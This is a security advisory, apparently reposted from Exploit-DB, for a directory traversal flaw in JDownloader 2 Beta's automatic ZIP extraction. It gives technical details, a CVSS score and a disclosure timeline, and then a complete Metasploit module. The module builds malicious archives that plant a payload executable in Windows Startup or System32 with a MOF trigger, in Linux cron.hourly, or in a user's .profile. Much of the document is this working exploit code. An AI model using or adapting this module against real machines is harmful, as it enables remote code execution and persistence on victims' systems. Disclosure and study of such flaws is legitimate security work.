JDownloader 2 Beta Directory Traversal Vulnerability

Posted on Posted in Exploit
EDB-ID: 37198 CVE: N/A OSVDB-ID: N/A
Verified: Yes Author: PizzaHatHacker Published: 2015-06-04
Download Exploit: Source Download Vulnerable App: N/A
=begin
# Exploit Title: JDownloader 2 Beta Directory Traversal Vulnerability (Zip Extraction)
# Date: 2015-06-02
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://jdownloader.org/home/index
# Software Link: http://jdownloader.org/download/offline
# Version: 1171 <= SVN Revision <= 2331
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Windows XP SP3 / Windows 7 SP1
# CVE: 
# Category: remote
 
1. Product Description
Extract from the official website :
"JDownloader is a free, open-source download management tool with a huge community of developers that makes downloading as easy and fast as it should be. Users can start, stop or pause downloads, set bandwith limitations, auto-extract archives and much more. It's an easy-to-extend framework that can save hours of your valuable time every day!"
 
2. Vulnerability Description & Technical Details
JDownloader 2 Beta is vulnerable to a directory traversal security issue.
 
Class : org.appwork.utils.os.CrossSystem
Method : public static String alleviatePathParts(String pathPart)
 
This method is called with a user-provided path part as parameter,
and should return a valid and safe path where to create a file/folder.
 
This method first checks that the input filepath does not limit
itself to a (potentially dangerous) sequence of dots and otherwise 
removes it :
pathPart = pathPart.replaceFirst("\\.+$", "");
 
However right after this, the value returned is cleaned from
starting and ending white space characters :
return pathPart.trim();
 
Therefore, if you pass to this method a list of dots followed by some white space
like "..  ", it will bypass the first check and then return the valid path ".."
which is insecure.
 
This leads to a vulnerability when JDownloader 2 Beta just downloaded a ZIP file and
then tries to extract it. A ZIP file with an entry containing ".. " sequence(s) 
would cause JD2b to overwrite/create arbitrary files on the target filesystem.
 
3. Impact Analysis :
To exploit this issue, the victim is required to launch a standard ZIP file download.
The Unzip plugin is enabled by default in JDownloader : any ZIP file downloaded will
automatically be extracted.
 
By exploiting this issue, a malicious user may be able to create/overwrite arbitrary
files on the target file system.
Therefore, it is possible to take the control of the victim's machine with the rights of
the JDownloader process - typically standard (non-administrator) rights - for example by
overwriting existing executable files, by uploading an executable file in a user's
autorun directory etc.
 
4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Medium (AC:M)
- Authentication (Au) : None (Au:N)
 
* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)
 
* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 6.8
- Impact Subscore 6.4
- Exploitability Subscore 8.6
 
5. Proof of Concept
- Create a ZIP file with an entry like ".. /poc.txt"
- Upload it to an HTTP server (for example)
- Run a vulnerable revision of JDownloader 2 Beta and use it to download the file from the server
- JD2b will download and extract the file, which will create a "poc.txt" one level upper from your download directory
 
OR see the Metasploit Exploit provided.
 
6. Vulnerability Timeline
2012-04-27 : Vulnerability created (SVN Revision > 1170)
2014-08-19 : Vulnerability identified
[...]      : Sorry, I was not sure how to handle this and forgot about it for a long time
2015-05-08 : Vendor informed about this issue
2015-05-08 : Vendor response + Code modification (Revision 2332)
2015-05-11 : Code modification (SVN Revision 2333)
2015-05-11 : Notified the vendor : The vulnerable code is still exploitable via ".. .." (dot dot blank dot dot)
2015-05-12 : Code modification (SVN Revision 2335)
2015-05-12 : Confirmed to the vendor that the code looks now safe
2015-06-01 : JDownloader 2 Beta Update : Looks not vulnerable anymore
2015-06-04 : Disclosure of this document
 
7. Solution
Update JDownloader 2 Beta to the latest version.
 
8. Personal Notes
 
I am NOT a security professional, just a kiddy fan of security.
I was boring so I looked for some security flaws in some software and happily found this.
If you have any questions/remarks, don't hesitate to contact me by email.
I'm interesting in any discussion/advice/exchange/question/criticism about security/exploits/programming ūüôā
=end
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
 
  def initialize( info = {} )
 
    super( update_info( info,
      'Name'          => 'JDownloader 2 Beta Directory Traversal Vulnerability',
      'Description'   => %q{
        This module exploits a directory traversal flaw in JDownloader 2 Beta 
        when extracting a ZIP file (which by default is automatically done by JDL).
         
        The following targets are available :
        Windows regular user : Create executable file in the 'Start Menu\Startup'
        under the user profile directory. (Executed at next session startup).
        Linux regular user : Create an executable file and a .profile script calling
        it in the user's home directory. (Executed at next session login).
        Windows Administrator : Create an executable file in C:\\Windows\\System32
        and a .mof file calling it. (Executed instantly).
        Linux Administrator : Create an executable file in /etc/crontab.hourly/.
        (Executed within the next hour).
         
        Vulnerability date : Apr 27 2012 (SVN Revision > 1170)
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'PizzaHatHacker <PizzaHatHacker[A]gmail[.]com>' ], # Vulnerability Discovery & Metasploit module
      'References'    =>
      [
        [ 'URL', 'http://jdownloader.org/download/offline' ],
      ],
      'Platform'      => %w{ linux osx solaris win },
      'Payload'       => {
        'Space' => 20480, # Arbitrary big number
        'BadChars' => '',
        'DisableNops' => true
    },
      'Targets'       =>
        [
          [ 'Windows Regular User (Start Menu Startup)',
            {
              'Platform'     => 'win',
              'Depth'        => 0, # Go up to root (C:\Users\Joe\Downloads\..\..\..\ -> C:\)
              'RelativePath' => 'Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/',
              'Option'       => nil,
            }
          ],
          [ 'Linux Regular User (.profile)',
            {
              'Platform'     => 'linux',
              'Depth'        => -2, # Go up 2 levels (/home/joe/Downloads/XXX/xxx.zip -> /home/joe/)
              'RelativePath' => '',
              'Option'       => 'profile',
            }
          ],
          [ 'Windows Administrator User (Wbem Exec)',
            {
              'Platform'     => 'win',
              'Depth'        => 0, # Go up to root (n levels)
              'RelativePath' => 'Windows/System32/',
              'Option'       => 'mof',
            }
          ],
          [ 'Linux Administrator User (crontab)',
            {
              'Platform'  => 'linux',
              'Depth'        => 0, # Go up to root (n levels)
              'RelativePath' => 'etc/cron.hourly/',
              'Option'       => nil,
            }
          ],
        ],
      'DefaultTarget'  => nil,
      'DisclosureDate' => ''
      ))
     
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', '']),
         
         # C:\Users\Bob\Downloads\XXX\xxx.zip  => 4
         # /home/Bob/Downloads/XXX/xxx.zip     => 4
         OptInt.new('DEPTH', [true, 'JDownloader download directory depth. (0 = filesystem root, 1 = one subfolder under root etc.)', 4]),
      ], self.class)
   
 register_advanced_options(
   [
     OptString.new('INCLUDEDIR', [ false, 'Path to an optional directory to include into the archive.', '']),
   ], self.class)
  end
   
  # Traversal path
  def traversal(depth)
    result = '.. /'
    if depth < 0
      # Go up n levels
      result = result * -depth
    else
      # Go up until n-th level
      result = result * (datastore['DEPTH'] - depth)
    end
    return result
  end
   
  def exploit
    # Create a new archive
    zip = Rex::Zip::Archive.new
   
    # Optionally include an initial directory
    dir = datastore['INCLUDEDIR']
    if not dir.nil? and not dir.empty?
      print_status("Filling archive recursively from path #{dir}")
      zip.add_r(dir)
    end
   
    # Create the payload executable file path
    exe_name = rand_text_alpha(rand(6) + 1) + (target['Platform'] == 'win' ? '.exe' : '')
    exe_file = traversal(target['Depth']) + target['RelativePath'] + exe_name
 
    # Generate the payload executable file content
    exe_content = generate_payload_exe()
 
    # Add the payload executable file into the archive
    zip_add_file(zip, exe_file, exe_content)
   
    # Check all available targets
    case target['Option']
    when 'mof'
      # Create MOF file data
        mof_name = rand_text_alpha(rand(6) + 1) + '.mof'
        mof_file = traversal(0) + 'Windows\\System32\\Wbem\\Mof\\' + mof_name
        mof_content = generate_mof(mof_name, exe_name)
        zip_add_file(zip, mof_file, mof_content)
    when 'profile'
      # Create .profile file
      bashrc_name = '.profile'
      bashrc_file = traversal(target['Depth']) + bashrc_name
      bashrc_content = "chmod a+x ./#{exe_name}\n./#{exe_name}"
      zip_add_file(zip, bashrc_file, bashrc_content)
    end
     
    # Write the final ZIP archive to a file
    zip_data = zip.pack
    file_create(zip_data)
  end
   
  # Add a file to the target zip and output a notification
  def zip_add_file(zip, filename, content)
    print_status("Adding '#{filename}' (#{content.length} bytes)");
    zip.add_file(filename, content, nil, nil, nil)
  end
end
Facebooktwittergoogle_plus